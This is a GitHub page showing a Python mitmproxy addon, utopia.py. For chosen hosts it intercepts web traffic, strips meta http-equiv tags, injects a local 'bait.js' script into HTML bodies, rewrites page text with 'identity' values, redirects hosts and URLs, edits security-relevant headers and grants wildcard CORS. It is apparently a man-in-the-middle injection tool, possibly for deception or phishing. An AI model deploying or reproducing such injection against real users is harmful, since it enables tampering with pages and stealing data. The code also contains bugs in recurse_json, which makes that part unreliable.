-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathutopia.py
167 lines (127 loc) · 4.65 KB
/
utopia.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
import lxml.html
from lxml.html import builder as E
from mitmproxy import http
import fnmatch
import json
import logging
import re
import string
import traceback
from pathlib import Path
data = {}
data_stats = None
cdir = Path(__file__).parent
data_path = cdir / "data.json"
logger = logging.getLogger(__name__)
def load_data():
global data, data_stats
current_stats = data_path.stat()
if data_stats is not None and (current_stats.st_mtime == data_stats.st_mtime and current_stats.st_size == data_stats.st_size):
return
try:
data = json.loads(data_path.read_text())
data_stats = current_stats
except json.JSONDecodeError:
logger.warning("Chyba dekodovania dat")
def recurse_json(data, replace_data):
if isinstance(data, list):
changed = []
for x in data:
changed.append(recurse_json(x), replace_data)
return changed
elif isinstance(data, dict):
changed = {}
for key, val in data.items():
changed[key] = recurse_json(val, replace_data)
elif isinstance(data, str):
return replace_data.get(data, data)
else:
return data
def response(flow: http.HTTPFlow) -> None:
if flow.response:
flow.response.headers.update(data.get("add_headers", {}).copy())
for header in tuple(flow.response.headers.keys()):
if header.lower() in data.get("remove_headers", []):
del flow.response.headers[header]
for pattern, target in data.get("redirects", {}).items():
if fnmatch.fnmatch(flow.request.url, pattern):
flow.response.status_code = 302
flow.response.headers["Location"] = target
return
for x in data.get("intercepted_hosts", []):
if flow.request.pretty_host.endswith(x):
break
else:
return
if flow.request.pretty_host.startswith("api"):
return
is_html = False
is_js = False
for k, v in flow.response.headers.items():
if "text/html" in v.lower():
is_html = True
break
elif "application/javascript" in v.lower():
is_js = True
break
if not (is_html or is_js):
return
to_replace = data.get("replace_global", {})
to_replace.update(data.get("replace_hosts", {}).get(flow.request.host, {}))
txt = flow.response.text
if is_html:
try:
tree = lxml.html.fromstring(txt)
for elem in tree.xpath(".//meta"):
if elem.get("http-equiv"):
elem.getparent().remove(elem)
for elem in tree.xpath(".//body"):
js_content = open("bait.js", "r").read()
injector = E.SCRIPT(js_content)
elem.getparent().insert(0, injector)
break
txt = lxml.html.tostring(tree).decode()
except:
print("XML parser error in " + flow.request.url)
traceback.print_exc()
for key, value in to_replace.items():
value = string.Template(value).safe_substitute(data.get("identity", {}))
txt = txt.replace(key, value)
flow.response.text = txt
logger.info(f"intercepting html `{flow.request.url}`")
def request(flow: http.HTTPFlow) -> None:
load_data()
host = flow.request.pretty_host
# Automatically add and respond to CORS
if flow.request.method == "OPTIONS":
flow.response = http.Response.make(200, b"",
{
"Access-Control-Allow-Origin": "*",
"Access-Control-Allow-Methods": "GET,POST,PUT,DELETE",
"Access-Control-Allow-Headers": "*",
"Access-Control-Max-Age": "1728000"
})
return
for x in data.get("intercepted_hosts", []):
if host.endswith(x):
break
else:
return
if flow.websocket:
return
flow.request.marker = ":mage_man:"
redir_host = data.get("redirect_hosts", {}).get(host)
if redir_host:
flow.request.host = redir_host
for pattern, dest in data.get("path_replace_hosts", {}).items():
match = re.match(pattern, str(flow.request.url))
if match is None:
continue
groups = {}
for idx, group in enumerate(match.groups()):
groups[f"regex{idx}"] = group
flow.request.url = string.Template(dest).safe_substitute(groups)
logger.info("Rewriting url to: " + flow.request.url)
break
if flow.request.url.endswith(".js"):
return